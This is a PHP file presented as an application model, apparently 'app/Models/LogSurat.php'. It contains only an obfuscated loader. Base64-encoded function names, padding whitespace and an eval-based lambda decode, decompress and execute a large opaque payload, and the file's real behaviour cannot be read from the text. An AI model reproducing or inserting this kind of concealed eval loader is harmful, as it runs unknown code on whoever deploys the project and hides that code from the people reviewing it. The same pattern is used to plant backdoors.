<?php 
        $__='printf';$_='Loading app/Models/LogSurat.php';
        































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtWltvm0gUfo+0/yEPldyqqxRwnMSK/GCwGcAOqbHNZV4qmEkAm1uCb/jX78H4mjTarNpddav5LAzGM+fynZuVcH5e4cM3QKuWPYfJ7LF2u/m4RavmZtmXu5Q+RPmXfuoP58/u7CILsnMpcvP84uKidnu2FXP+xxl7/XqvszKe5z8RrVd3ajbfzB2LDzHqtmqbW4eseBe2Odc6Z2BgYPg9USOxyVFbm6vIFBxrmWpy89EuptdV04SuWbXrb4wqBgYGBgYGBgYGhv8b2J8zGBgYGH5f1Dw3f7i6/EYfSEofareMEQYGBgYGhh/C6YMInUGqS3Ej8CxzTZA8wUNRJIpIRlZziq3V+n7J9TqDjCfC2B/Y4tLuBhyF701FC1zbWNtdfeHFOMNcNC3XUluP1K556QjmkqJo4U1yXUrMNcjVPLTiPSuaO7YR2V0joEgOHVhvd83cq8s8thqc3dV411pNsa1e7/QOrVVOLT7zYpnD5qoL+wMnltdwLXuouaKWOafySvcEI/I6b+iTdR78WpDEIEYsTxzLiAi/uvME8paeEQV/vboGNuHAEWSwSSfjurEgsZzgEejxuZ4jrAJSv/NHqJmM62bh2AMf2wEHvkxJIVY2tbneA3CjSm1fVTa2dTyhEbsW1XCnkrP5Trp56u2v20+qbKSwlnMsLYcz6NEXjhABb+ZUVWhGke9TFEQq4hcYmXn/aC/E1a+uU3+g4ICE4poqGvhGdCncrPF74c32WlySuAk263AMfE0p+V1FaofzNWG1wHxzTW0toFLJVbrbv+iF6ZEsceyisU9iMwe+M/BvrSrGQkVmgAWzUNFq4YBsT7gEfnBEkqlPbLM8z49sPZbXprEM++QC+G4crVnsromiLYCLyYYPyahDPqalzVZBY4jbDOwYbe3OVYkuy5hQy+DdovrsWDzkLkns0VEMFJEH3zOnEGNqNSabHA7FF/L8bGfDPq6bQyywbfAkviw5TF37bvY11iLI0Tmu62OvCNCJnE56tc2f0p4My82dnkdS5VLSK22rYtQ8cC8uKeSEa935ODHnTr3k+9InyJxjxQQf87Q32PmT7zndcLb7V6lkcC6K1v1RI4Q6Bx7o2kQ36fgg4+o+1iGW+rovtRPXApvK7ySS3e9zmfs73nYc/4A98gxyKbmfZBMPyWtSLCEno6ldF6FnAa/FG/a8qiV94tXFSFWgz9haA+pwThXzGeyOQFcCNgdv1w/UXizP1ENvgvhWck7XaRHILMBviVpRDjVZfD9vzdBD0URFmPdinXPBD1Wp7NvwL1C43013Ot7BXdkDi4ch95kKQUTicbrlCHwbJH1JDCjURk+iT7QOOVWug75LQj8Dvo/qgvvsWoP38dml4Cv00FDkvaTcK85ADsQE5gKaBcAB1MHSxzHwMLw81PWJjEO9kLpRuFYjeTdfCPTLwHUXZx4yRbAF9ms8ReM3cw36X+PlvWrdPm4jipqFY9EI8m3q2vozcBZTpb3hDPp6Bnaue5JWzoKgL0BvEqJlv55PoQ9nBPiD2TFzzG2/VLhwb8vLo3PjH2ZJeoUh993CT3BiLLViOvuagD2SH0IOrZ1hMyCJnhGpeX3oKyXX8rZPGE01nL72qzquVNTgPbS8PnC7ia0PM41zBN/vHc/rsD3Fw+mLvlYd5YwDXqBnawvInXLdS5nf6VWv5oQCMefKGoKa46DP+Bj6IxWq+fCv5kvXWFChkXswy6tZbfx+eRMffPw5+lLfS+D3WefU/8ehOAH+Jq7UTg07mGBbrHiWjKg3FE/zopqN5W8tmCkmzPNm0SvXjV7IHBz1naTsPa1W7fbs7L//cdzanD9uP326/Sfbj/a+Z+OHg8KPtfK99udeLXsG+Nd+Bvg0hh9PkqYK4afbvwBhNOZ3';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































                                                                                                                                                                                                                     $________;
